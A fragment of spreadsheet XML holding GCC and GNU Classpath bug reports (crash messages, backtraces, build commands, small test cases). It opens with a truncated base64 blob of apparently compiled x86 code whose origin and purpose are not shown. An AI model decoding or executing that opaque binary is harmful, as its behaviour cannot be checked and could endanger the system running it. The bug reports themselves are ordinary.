 D4VqAgAAV+jP+P//hcBZD4VbAgAAvvsMQQBTVuj12///iUX8jYW4+v//U1BTU1fo7x8AAIPE
 HDld/IldCH4x/3UIVuie2///OBhZWXQXUI2FuPr//1DoleP//1mFwFkPhQsCAAD/RQiLRQg7
 Rfx8z42FyP7//1Dog+X//42FvPv//8cEJAQBAABQU/8VFNFAAI2FyP7//1NQjYW8+///UP8V
 fNBAAIXAD4TCAQAAizWA0EAAjYXI/v//aiBQ/9ZoAFABAI2FyP7//1dQ6LH0//+DxAyFwA+E
 hwEAAI1F+FNQV41N5OjMvf//O8OJRQgPhG4BAACBffgAUAEAD4ZZAQAAgX34AAAwAA+DTAEA
 AI2FvPv//1NQjYW0+f//UI2FxP3//1BX6PgeAACNhbT5//9QjYXE/f//UOiKHQAAjYW8+///
 UI2FxP3//1Dodx0AAI2FxP3//2is8EAAUOhmHQAAagRqA42FwPz//2oDUOgj3f//D76FwPz/
 /1DotSAAAIPEQIiFwPz//42FwPz//1CNhcT9//9Q6CsdAACNRfRQ/3X4/3UI6BkaAACDxBQ7
 w4lFCI1N5A+EoQAAAOiuvf///3X0jYXE/f///3UIUOha4///jYXE/f//UOiq+v//g8QQjYXE
 /f//aidQ/9aNRcxQV+io5v//WYlF/FlqIFf/1lONhcj+//9XUP8VfNBAAI2FyP7//1DoUOT/
 /42FxP3//1Bo1ABBAOiKHAAAaMDwQABX6DT8//+DxBQ5Xfx0DI1FzFBX6J3m//9ZWf91COj+
 IAAAWWoBWOsXjU3k6A29//+Nhcj+//9Q6P7j//9ZM8BfXlvJw1WL7IHsKAQAAFaNTejoKrz/
 /4Nl/ACNRfhqAVD/dQiNTejoGLz//4vwhfYPhJMAAACNheD9//9QjYXY+///UI2F3Pz//1CN
 heT+//9Q/3UI6FcdAACNhdz8//9QjYXk/v//UOjpGwAAjYXY+///UI2F5P7//1Do1hsAAICl
 5f3//wCNheH9//9QjYXk/v//UOi8GwAAjYXk/v//aNwBQQBQ6KsbAACNRfxQ/3X4VuiqGQAA
 i/CDxECF9o1N6HUJ6DW8//8zwOtU6Cy8////dfyNheT+//9WUOja4f//Vuj5HwAAg8QQM/b/
 FcTQQABQjYXk/v//UOjY6///WYXAWXQZav9Q/xXA0EAAjYXk/v//UOjg4v//WWoBXovGXsnD
 VYvsgewEAQAAjYX8/v//aAQBAABQaKAxQQBqBWhSAkEA6CrY//9ZWVBoAQAAgOiO6f//agGN
 hfz+////dQz/dQhQ6ODo//+DxCTJw1WL7IHsDAIAAFMz2zldDFZXiV38D4WLAQAAvosJQQBT
 VugO2P//i/iNhfT9//9QjYX4/v//UFNTiJ34/v///3UI6Psb</t>
  </si>
  <si>
    <t>verhagen</t>
  </si>
  <si>
    <t>GCC-33765</t>
  </si>
  <si>
    <t>[4.3 regression] gcj internal compiler error when reading an empty file</t>
  </si>
  <si>
    <t>Feeding gcj an empty input file results in
[bero@localhost ~]$ rm -f crap.java  touch crap.java  gcj crap.java
/tmp/cck13U8f.jar:0: internal compiler error: in java_parse_file at java/jcf-parse.c:1951
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-49815</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in cselib_record_set at cselib.c:2241 compiling 64-bit libjava on SPARC</t>
  </si>
  <si>
    <t>Solaris/SPARC bootstrap is currently broken:
$ /bin/ksh ./libtool --tag=GCJ   --mode=compile /var/gcc/regression/trunk/11-gcc/build/./gcc/gcj -B/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/regression/trunk/11-gcc/build/./gcc/ -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include  -m64 -Usun -fclasspath= -fbootclasspath=/vol/gcc/src/hg/trunk/local/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2  -m64  -c -o javax/swing/plaf/basic.lo -fsource-filename=/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/classpath/lib/classes -MT javax/swing/plaf/basic.lo -MD -MP -MF javax/swing/plaf/basic.deps @javax/swing/plaf/basic.list
libtool: compile:  /var/gcc/regression/trunk/11-gcc/build/./gcc/gcj -B/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/regression/trunk/11-gcc/build/./gcc/ -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include -m64 -Usun -fclasspath= -fbootclasspath=/vol/gcc/src/hg/trunk/local/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -m64 -c -fsource-filename=/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libjava/classpath/lib/classes -MT javax/swing/plaf/basic.lo -MD -MP -MF javax/swing/plaf/basic.deps @javax/swing/plaf/basic.list  -fPIC -o javax/swing/plaf/.libs/basic.o
/vol/gcc/src/hg/trunk/local/libjava/classpath/javax/swing/plaf/basic/BasicLookAndFeel.java: In class 'javax.swing.plaf.basic.BasicLookAndFeel':
/vol/gcc/src/hg/trunk/local/libjava/classpath/javax/swing/plaf/basic/BasicLookAndFeel.java: In method 'javax.swing.plaf.basic.BasicLookAndFeel.initComponentDefaults(javax.swing.UIDefaults)':
In file included from /vol/gcc/src/hg/trunk/local/libjava/classpath/javax/swing/plaf/basic/BasicLookAndFeel.java:102:0
[...]
/vol/gcc/src/hg/trunk/local/libjava/classpath/javax/swing/plaf/basic/BasicInternalFrameUI.java:875:0: internal compiler error: in cselib_record_set at cselib.c:2241
Here's a reduced command line:
$ jc1 ccd.list -fuse-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -m64 -g -O2 -ffilelist-file -fencoding=UTF-8 -fbootstrap-classes -fPIC -fbootclasspath=./:/vol/gcc/src/hg/trunk/local/libjava/classpath/lib/
I'm attaching the ccd.list file.
Stacktrace is
#0  fancy_abort (file=0x956890 /vol/gcc/src/hg/trunk/local/gcc/cselib.c line=2241 function=0x956ad0 cselib_record_set) at /vol/gcc/src/hg/trunk/local/gcc/diagnostic.c:893
#1  0x001f94a4 in cselib_record_set (insn=0x6cf02870) at /vol/gcc/src/hg/trunk/local/gcc/cselib.c:2241
#2  cselib_record_sets (insn=0x6cf02870) at /vol/gcc/src/hg/trunk/local/gcc/cselib.c:2422
#3  0x001f95f0 in cselib_process_insn (insn=0x6cf02870) at /vol/gcc/src/hg/trunk/local/gcc/cselib.c:2475
#4  0x00598860 in vt_initialize () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:9012
#5  0x0059bd70 in variable_tracking_main_1 () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:9167
#6  variable_tracking_main () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:9219
#7  0x0038f348 in execute_one_pass (pass=0xace298) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2063
#8  0x0038f724 in execute_pass_list (pass=0xace298) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2118
#9  0x0038f748 in execute_pass_list (pass=0xacc670) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2119
#10 0x0038f748 in execute_pass_list (pass=0xacc6a4) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2119
#11 0x0047d924 in tree_rest_of_compilation (fndecl=0x7f52b980) at /vol/gcc/src/hg/trunk/local/gcc/tree-optimize.c:416
#12 0x001ede64 in cgraph_expand_function (node=0x7deaf1b8) at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1797
#13 0x001ef854 in cgraph_expand_all_functions () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1856
#14 cgraph_optimize () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:2126
#15 0x001efda4 in cgraph_finalize_compilation_unit () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1304
#16 0x00340e70 in write_global_declarations () at /vol/gcc/src/hg/trunk/local/gcc/langhooks.c:303
#17 0x00170844 in java_write_globals () at /vol/gcc/src/hg/trunk/local/gcc/java/class.c:3241
#18 0x00437c20 in compile_file (argc=19 argv=0xffbff3ec) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:564
#19 do_compile (argc=19 argv=0xffbff3ec) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:1886
#20 toplev_main (argc=19 argv=0xffbff3ec) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:1962
#21 0x00166ef4 in _start ()
The last working bootstrap was on 20110715 (r176317) 20110720 (unknown rev)
was already broken 20110722 (r176317) still is.</t>
  </si>
  <si>
    <t>GCC-9750</t>
  </si>
  <si>
    <t>Strange code in handling of COND? expressions in cp/call.c</t>
  </si>
  <si>
    <t>This code is in gcc-3.2.2/gcc/cp/call.c line 1961
      /* Otherwise the types should be pointers.  */
      if (!(TREE_CODE (type1) == POINTER_TYPE
	    || TYPE_PTRMEM_P (type1)
	    || TYPE_PTRMEMFUNC_P (type1))
	  || !(TREE_CODE (type2) == POINTER_TYPE
	       || TYPE_PTRMEM_P (type2)
	       || TYPE_PTRMEMFUNC_P (type2)))
	return candidates
      /* We don't check that the two types are the same the logic
	 below will actually create two candidates one in which both
	 parameter types are TYPE1 and one in which both parameter
	 types are TYPE2.  */
	break
      /* These arguments do not make for a legal overloaded operator.  */
      return candidates
Note that the indentation for the break statement suggests that someone expects it was part of an if statement perhaps. And the return candidates code is now unreachable.
Probably not a bug but a bit confuzzling.
Release:
gcc-3.2.2
Environment:
All.
How-To-Repeat:
antic distributed as part of the jlint package found this.</t>
  </si>
  <si>
    <t>john.carter</t>
  </si>
  <si>
    <t>GCC-34801</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: gcc.dg/Warray-bounds.c</t>
  </si>
  <si>
    <t>This should have already been reported but I cannot find any trace of it.
gcc.dg/Warray-bounds.c fails on all the platforms I have looked at:
FAIL: gcc.dg/Warray-bounds.c  (test for warnings line 59)
FAIL: gcc.dg/Warray-bounds.c  (test for warnings line 65)
FAIL: gcc.dg/Warray-bounds.c  (test for warnings line 66)
where the wernings are missing for the above lines. This can be traced to revision 131502:
	PR middle-end/32135
	* tree-ssa-ccp.c (maybe_fold_offset_to_array_ref): Do not construct
	references above array bounds.  This might trigger bounds checks for
	pointers to arrays.</t>
  </si>
  <si>
    <t>GCC-32780</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in extract_range_from_binary_expr at tree-vrp.c:1793 at -O2 or higher</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I../../../../include -I../../../../hw/xfree86 -I../../../../hw/xfree86/include -I../../../../hw/xfree86/common -I../../../../hw/xfree86/os-support -I../../../../hw/xfree86/os-support/bus -I../../../../os -I/usr/include/drm -DUSESTDRES -DHAVE_SYSV_IPC -DHAVE_XORG_CONFIG_H -DXF86PM -DHAVE_ACPI -DHAVE_APM -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -fno-strict-aliasing -D_BSD_SOURCE -DHAS_FCHOWN -DHAS_STICKY_DIR_BIT -I/usr/include/freetype2 -I../../../../include -I../../../../include -I../../../../Xext -I../../../../composite -I../../../../damageext -I../../../../xfixes -I../../../../Xi -I../../../../mi -I../../../../miext/shadow -I../../../../miext/damage -I../../../../render -I../../../../randr -I../../../../fb -O2  -MT lnx_init.lo -MD -MP -MF .deps/lnx_init.Tpo -c lnx_init.c  -fPIC -DPIC -o .libs/lnx_init.o
lnx_video.c: In function 'unmapVidMem':
lnx_video.c:516: internal compiler error: in extract_range_from_binary_expr at tree-vrp.c:1793
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-68689</t>
  </si>
  <si>
    <t>flexible array members in unions accepted in C++</t>
  </si>
  <si>
    <t>GCC (in C mode) rejects flexible array members in unions.  G++ (i.e. in C++ mode) accepts them.  Since flexible array members are a G++ extension provided for compatibility with C and specifically GCC G++ should accept and reject the same constructs as GCC does.
$ cat z.cpp &amp;&amp; /build/gcc-trunk-svn/gcc/xg++ -B /build/gcc-trunk-svn/gcc -S -Wall -Wextra -Wpedantic -o/dev/null z.cpp
union U {
    int n
    int a[]
} u
z.cpp:3:11: warning: ISO C++ forbids zero-size array â€˜aâ€™ [-Wpedantic]
     int a[]
           ^</t>
  </si>
  <si>
    <t>GCC-52264</t>
  </si>
  <si>
    <t>translatable string typo: refernece</t>
  </si>
  <si>
    <t>gcc/cgraphunit.c:670:
Alias has non-alias refernece -&gt; ... reference</t>
  </si>
  <si>
    <t>GCC-51118</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: tree check: expected tree that contains â€˜typedâ€™ structure have â€˜blockâ€™ in fold_checksum_tree at fold-const.c:14160</t>
  </si>
  <si>
    <t>$ ../configure --enable-bootstrap --prefix=/home/matt --enable-languages=cc++ --enable-stage1-checking=all
[...]
$ make
[...]
/home/matt/src/gcc-trunk/obj/./gcc/xgcc -B/home/matt/src/gcc-trunk/obj/./gcc/ -B/home/matt/x86_64-unknown-linux-gnu/bin/ -B/home/matt/x86_64-unknown-linux-gnu/lib/ -isystem /home/matt/x86_64-unknown-linux-gnu/include -isystem /home/matt/x86_64-unknown-linux-gnu/sys-include -g -O2 -m32 -O2 -g -O2 -DIN_GCC -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -isystem ./include -fpic -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -fpic -I. -I. -I../../.././gcc -I../../../../libgcc -I../../../../libgcc/. -I../../../../libgcc/../gcc -I../../../../libgcc/../include -I../../../../libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS -DUSE_TLS -o _muldi3.o -MT _muldi3.o -MD -MP -MF _muldi3.dep -DL_muldi3 -c ../../../../libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
../../../../libgcc/libgcc2.c: In function __muldi3:
../../../libgcc/libgcc2.c:553:3: internal compiler error: tree check: expected tree that contains â€˜typedâ€™ structure have â€˜blockâ€™ in fold_checksum_tree at fold-const.c:14160
I get the same results when setting CC and CXX to be gcc-4.4 and g++-4.4 respectively (the default system compiler on Ubuntu 11.10 is 4.6.1-based).
Running the commandline that causes the ICE with -O1 also elicits the problem. Setting BOOT_CFLAGS and CFLAGS to -O1 doesn't help matters.</t>
  </si>
  <si>
    <t>GCC-78123</t>
  </si>
  <si>
    <t>Short reads with T edit descriptor not padding correctly</t>
  </si>
  <si>
    <t>See report here:
https://gcc.gnu.org/ml/fortran/2016-10/msg00194.html</t>
  </si>
  <si>
    <t>GCC-67721</t>
  </si>
  <si>
    <t>deep copy missing when assigning a derived type constructor to an array</t>
  </si>
  <si>
    <t>In the following test the assignment to v does a shallow copy of the rhs so that the c2 components are shared among array elements.
Then any change made to one array element also impacts the other elements.
! { dg-do run }
!
! Check that scalar to array assignments of derived type constructor
! deep copy the value when there are allocatable components.
program p
  implicit none
  type :: t1
    integer :: c1
  end type t1
  type :: t2
    type(t1) allocatable :: c2
  end type t2
  block
    type(t2) :: v(4)
    v = t2(t1(3))
    v(2)%c2%c1 =  7
    v(3)%c2%c1 = 11
    v(4)%c2%c1 = 13
    if (v(1)%c2%c1 /=  3) call abort
    if (v(2)%c2%c1 /=  7) call abort
    if (v(3)%c2%c1 /= 11) call abort
    if (v(4)%c2%c1 /= 13) call abort
  end block
end program p</t>
  </si>
  <si>
    <t>GCC-663</t>
  </si>
  <si>
    <t>linuxbox1 % i686-pc-linux-gnu-gcc boom7.c
boom7.c: In function `main':
boom7.c:21: warning: comparison is always true due to limited range of data type
boom7.c:21: warning: comparison is always false due to limited range of data type
boom7.c:21: Internal compiler error in `do_jump' at expr.c:10905
Please submit a full bug report.
See  for instructions.
linuxbox1 %
Release:
2.8.1 -- 2.95.2
Environment:
Solaris/Linux</t>
  </si>
  <si>
    <t>GCC-20522</t>
  </si>
  <si>
    <t>ICE in update_aliases at java/decl.c:163</t>
  </si>
  <si>
    <t>Found while building rhino's js.jar.
Grab js.jar from http://spindazzle.org/js.jar (sources from JPackage.org).
Try....
$ gcj -O1 -shared -o js.jar.so js.jar
I get an ICE in update_aliases at java/decl.c:163</t>
  </si>
  <si>
    <t>CLASSPATH-22652</t>
  </si>
  <si>
    <t>ClassCastException thrown for MessageDigestSpi subclasses</t>
  </si>
  <si>
    <t>the JDK documentation states that Security Providers wishing to implement concrete MessageDigest algorithms SHOULD extend MessageDigestSpi.
message digest implementations in the gnu.crypto package follow that rule yet when the MessageDigest.getInstance() -with 2 arguments- is invoked a ClassCastException is thrown e.g.:
java.lang.ClassCastException: gnu.crypto.jce.Sha160Spi cannot be cast to java.security.MessageDigest
cheers
rsn</t>
  </si>
  <si>
    <t>GCC-64982</t>
  </si>
  <si>
    <t>[5 Regression] Many g++ failures on x86_64-apple-darwin14 with -m32.</t>
  </si>
  <si>
    <t>At revision r220526 there are many g++ failures on x86_64-apple-darwin14 with -m32: see https://gcc.gnu.org/ml/gcc-testresults/2015-02/msg00974.html. Revision r220506 is OK. The ICEs are of the kind
/opt/gcc/_clean/gcc/testsuite/g++.dg/abi/covariant2.C:29:28: internal compiler error: Segmentation fault: 11
 c6* c24::f6() {  return 0 }
                            ^
and the backtrace is
* thread #1: tid = 0x6290629 0x0000000100679ae7 cc1plus`cgraph_node::function_symbol(this= availability=0x0000000000000000) + 71 at cgraph.c:3129 queue = 'com.apple.main-thread' stop reason = EXC_BAD_ACCESS (code=1 address=0x10)
    frame #0: 0x0000000100679ae7 cc1plus`cgraph_node::function_symbol(this= availability=0x0000000000000000) + 71 at cgraph.c:3129
   3126	
   3127	  while (node-&gt;thunk.thunk_p)
   3128	    {
-&gt; 3129	      node = node-&gt;callees-&gt;callee
   3130	      if (availability)
   3131		{
   3132		  enum availability a
(lldb) bt
* thread #1: tid = 0x6290629 0x0000000100679ae7 cc1plus`cgraph_node::function_symbol(this= availability=0x0000000000000000) + 71 at cgraph.c:3129 queue = 'com.apple.main-thread' stop reason = EXC_BAD_ACCESS (code=1 address=0x10)
  * frame #0: 0x0000000100679ae7 cc1plus`cgraph_node::function_symbol(this= availability=0x0000000000000000) + 71 at cgraph.c:3129
    frame #1: 0x0000000100eb8281 cc1plus`ix86_function_regparm(type=0x0000000142776a80 decl=0x0000000142777bd0) + 305 at i386.c:5774
    frame #2: 0x0000000100eba687 cc1plus`x86_can_output_mi_thunk((null)= (null)= vcall_offset=-16 function=0x0000000142777bd0) + 55 at i386.c:42800
    frame #3: 0x000000010019c0f8 cc1plus`use_thunk(thunk_fndecl=0x0000000142777e58 emit_p=) + 1416 at method.c:422
    frame #4: 0x00000001001b7ddd cc1plus`emit_associated_thunks(fn=) + 509 at semantics.c:4031
    frame #5: 0x00000001001b828b cc1plus`expand_or_defer_fn(fn=0x0000000142777288) + 59 at semantics.c:4122
    frame #6: 0x000000010014aed8 cc1plus`cp_parser_function_definition_after_declarator(parser=0x0000000142767000 inline_p=) + 248 at parser.c:23481
    frame #7: 0x000000010014be27 cc1plus`cp_parser_init_declarator + 3207 at parser.c:23385
    frame #8: 0x000000010014d54e cc1plus`cp_parser_simple_declaration(parser=0x0000000142767000 function_definition_allowed_p=true maybe_range_for_decl=0x0000000000000000) + 558 at parser.c:11601
    frame #9: 0x000000010014d904 cc1plus`cp_parser_block_declaration(parser=0x0000000142767000 statement_p=) + 116 at parser.c:11475
    frame #10: 0x00000001001568ca cc1plus`cp_parser_declaration(parser=0x0000000142767000) + 394 at parser.c:11372
    frame #11: 0x0000000100156b7d cc1plus`cp_parser_declaration_seq_opt(parser=0x0000000142767000) + 125 at parser.c:11258
    frame #12: 0x0000000100156ed2 cc1plus`c_parse_file() + 22 at parser.c:4109
    frame #13: 0x0000000100156ebc cc1plus`c_parse_file() + 604
    frame #14: 0x00000001002a1e76 cc1plus`c_common_parse_file() + 246 at c-opts.c:1052
    frame #15: 0x0000000100b6921c cc1plus`compile_file + 44 at toplev.c:594
    frame #16: 0x0000000100fe6507 cc1plus`toplev::main(int char**) + 1288 at toplev.c:2066
    frame #17: 0x0000000100fe5fff cc1plus`toplev::main(this= argc=4 argv=0x00007fff5fbff328) + 719
    frame #18: 0x0000000100fe720c cc1plus`main(argc= argv=) + 44 at main.c:39</t>
  </si>
  <si>
    <t>GCC-71350</t>
  </si>
  <si>
    <t>[4.9/5/6/7 regression] ICE on trailing return type declaration with initializer list</t>
  </si>
  <si>
    <t>Created attachment 38601
minimal example producing the internal compiler error
A student of mine stumbled upon an internal compiler error related to a trailing return type declaration containing an initializer list. I've attached a minimal example producing the error with Debian's versions 4.9.3-14 5.3.1-21 6.1.1-4 and 7.0 (revision 236009 package gcc-snapshot) all from Debian Sid with the flag `-std=c++11`. Note that the example should not compile due to the incorrect return value in method `Foo::bar`.
The output of `g++-6 -v -std=c++11 -save-temps bug.cc` follows.
Best Joost
Using built-in specs.
COLLECT_GCC=g++-6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 6.1.1-4' --with-bugurl=file:///usr/share/doc/gcc-6/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-6 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-6-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-6-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-6-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 6.1.1 20160519 (Debian 6.1.1-4) 
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/6/cc1plus -E -quiet -v -imultiarch x86_64-linux-gnu -D_GNU_SOURCE bug.cc -mtune=generic -march=x86-64 -std=c++11 -fpch-preprocess -o bug.ii
ignoring duplicate directory /usr/include/x86_64-linux-gnu/c++/6
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/6/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/6
 /usr/include/x86_64-linux-gnu/c++/6
 /usr/include/c++/6/backward
 /usr/lib/gcc/x86_64-linux-gnu/6/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/6/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/6/cc1plus -fpreprocessed bug.ii -quiet -dumpbase bug.cc -mtune=generic -march=x86-64 -auxbase bug -std=c++11 -version -o bug.s
GNU C++11 (Debian 6.1.1-4) version 6.1.1 20160519 (x86_64-linux-gnu)
	compiled by GNU C version 6.1.1 20160519 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version 0.15
warning: MPFR header version 3.1.4 differs from library version 3.1.4-p2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++11 (Debian 6.1.1-4) version 6.1.1 20160519 (x86_64-linux-gnu)
	compiled by GNU C version 6.1.1 20160519 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version 0.15
warning: MPFR header version 3.1.4 differs from library version 3.1.4-p2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 1edfa0d359b2ee208224c72d1e98c75a
'
Internal compiler error: Error reporting routines re-entered.
0x5e042b reshape_init_r
	../../src/gcc/cp/decl.c:5896
0x5e0644 reshape_init_class
	../../src/gcc/cp/decl.c:5673
0x5e0644 reshape_init_r
	../../src/gcc/cp/decl.c:5901
0x5dfe7d reshape_init(tree_node* tree_node* int)
	../../src/gcc/cp/decl.c:5945
0x5d2a55 implicit_conversion
	../../src/gcc/cp/call.c:1795
0x5d36db reference_binding
	../../src/gcc/cp/call.c:1525
0x5d286c implicit_conversion
	../../src/gcc/cp/call.c:1802
0x5d3f48 add_function_candidate
	../../src/gcc/cp/call.c:2121
0x5d4bef add_candidates
	../../src/gcc/cp/call.c:5354
0x5daa6f build_new_op_1
	../../src/gcc/cp/call.c:5491
0x5daf5e build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
	../../src/gcc/cp/call.c:5827
0x6814f5 build_x_array_ref(unsigned int tree_node* tree_node* int)
	../../src/gcc/cp/typeck.c:3918
0x60be66 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../src/gcc/cp/pt.c:16210
0x60ce58 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../src/gcc/cp/pt.c:16177
0x60e8d9 tsubst(tree_node* tree_node* int tree_node*)
	../../src/gcc/cp/pt.c:13527
0x642870 dump_template_bindings
	../../src/gcc/cp/error.c:349
0x642870 dump_substitution
	../../src/gcc/cp/error.c:1450
0x6482e4 decl_to_string
	../../src/gcc/cp/error.c:2955
0x6482e4 cp_printer
	../../src/gcc/cp/error.c:3535
0x112bfec pp_format(pretty_printer* text_info*)
	../../src/gcc/pretty-print.c:631
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>joostvanzwieten</t>
  </si>
  <si>
    <t>GCC-80919</t>
  </si>
  <si>
    <t>[7 Regression] ICE: Segmentation fault with -Wall when printing address of size 0 array</t>
  </si>
  <si>
    <t>Hey
the following code causes a GCC segmentation fault when compiled with -Wall:
#include 
void conftest(void)
{
  int gid[0]
  printf(%x\n 
}
Compiler output:
$ gcc -Wall -c -o conftest.o conftest.c
conftest.c: In function â€˜conftestâ€™:
conftest.c:6:3: internal compiler error: Segmentation fault
   printf(%x\n 
   ^~~~~~
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Cheers
Bastian</t>
  </si>
  <si>
    <t>bastian.beischer</t>
  </si>
  <si>
    <t>GCC-29682</t>
  </si>
  <si>
    <t>ICE: in change_pattern at haifa-sched.c:4066 with -O3 -msched-control-spec</t>
  </si>
  <si>
    <t>This happens on 4.2 and 4.3.  The option is new in 4.2.
tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 rpm-rpmpgp.c
tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 -msched-control-spec rpm-rpmpgp.c
rpm-rpmpgp.c: In function 'pgpReadPkts':
rpm-rpmpgp.c:49: internal compiler error: in change_pattern at haifa-sched.c:4066
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-2606</t>
  </si>
  <si>
    <t>Bad assembler output building libstdc++-v3 for i586-pc-msdosdjgpp</t>
  </si>
  <si>
    <t>I last weeks I'm getting bad assembler output from C++ compiler for target i586-pc-msdosdjgpp (both branches: gcc-3_0-branch and HEAD). Newest version I got working for that target was gcc-ss-20010320 (gcc-ss-20010326 already failed build)
I'm including part of assembler output for libstdc++-v3/src/globals.cc (with gcc-3_0-branch I got similar failures earlier with libstdc++-v3/src/bitset.cc). I marked bad assembler lines where C++ names were not correctly mangled with '===&gt;'.
Full preprocessed source and assembler output is in attachment.
I didn't saw similar problems for i686-pc-linux-gnu
Andris
       .file globals.ii
       .section .text
       .def  _string .scl  13   .type 010  .endef
.................    
       .def  _St13_Format_cacheIwE  .scl  13   .tag  _St13_Format_cacheIwE  .size 24   .type 010  .endef
       .def  _St9basic_iosIcSt11char_traitsIcEE .scl  10   .type 010  .size 136  .endef
       .def  _ios_base  .val  4 .scl  8 .tag  _ios_base  .size 100  .type 010  .endef
===&gt;   .def  __vptr$basic_ios &gt; .val  0 .scl  8 .type 01124   .endef
       .def  __M_tie .val  104  .scl  8 .type 030  .endef
       .def  __M_fill   .val  108  .scl  8 .type 02   .endef
       .def  __M_exception .val  112  .scl  8 .tag  __Ios_Iostate .size 4 .type 012  .endef
       .def  __M_streambuf .val  116  .scl  8 .type 030  .endef
       .def  __M_streambuf_state .val  120  .scl  8 .tag  __Ios_Iostate .size 4 .type 012  .endef
